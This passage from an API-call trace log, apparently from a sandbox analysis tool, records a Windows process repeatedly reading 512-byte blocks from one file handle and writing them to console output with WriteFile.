[0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] GetFileType (hFile=0x50) returned 0x1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] GetFileType (hFile=0x50) returned 0x1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, 
lpOverlapped=0x0) returned 1 [0128.159] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.159] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.159] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.159] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] GetFileType (hFile=0x50) returned 0x1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] GetFileType (hFile=0x50) returned 0x1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] WriteFile (in: hFile=0x50, 
lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.160] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.160] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 
[0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.162] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.162] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.162] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.162] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] GetFileType (hFile=0x50) returned 0x1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] GetFileType (hFile=0x50) returned 0x1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] GetFileType (hFile=0x50) returned 0x1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, 
lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] GetFileType (hFile=0x50) returned 0x1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] GetFileType (hFile=0x50) returned 0x1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] GetFileType (hFile=0x50) returned 0x1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] GetFileType (hFile=0x50) returned 0x1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] GetFileType (hFile=0x50) returned 0x1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: 
lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.163] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.163] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.163] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.163] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] GetFileType (hFile=0x50) returned 0x1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] GetFileType (hFile=0x50) returned 0x1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.164] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.164] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] 
GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 
[0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.165] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.165] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] GetFileType (hFile=0x50) returned 0x1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.167] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.167] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] GetFileType (hFile=0x50) returned 0x1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] GetFileType (hFile=0x50) returned 0x1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] GetFileType (hFile=0x50) returned 0x1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] GetFileType (hFile=0x50) returned 0x1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] GetFileType 
(hFile=0x50) returned 0x1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] GetFileType (hFile=0x50) returned 0x1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] GetFileType (hFile=0x50) returned 0x1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] GetFileType (hFile=0x50) returned 0x1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.168] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.168] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.168] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.168] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, 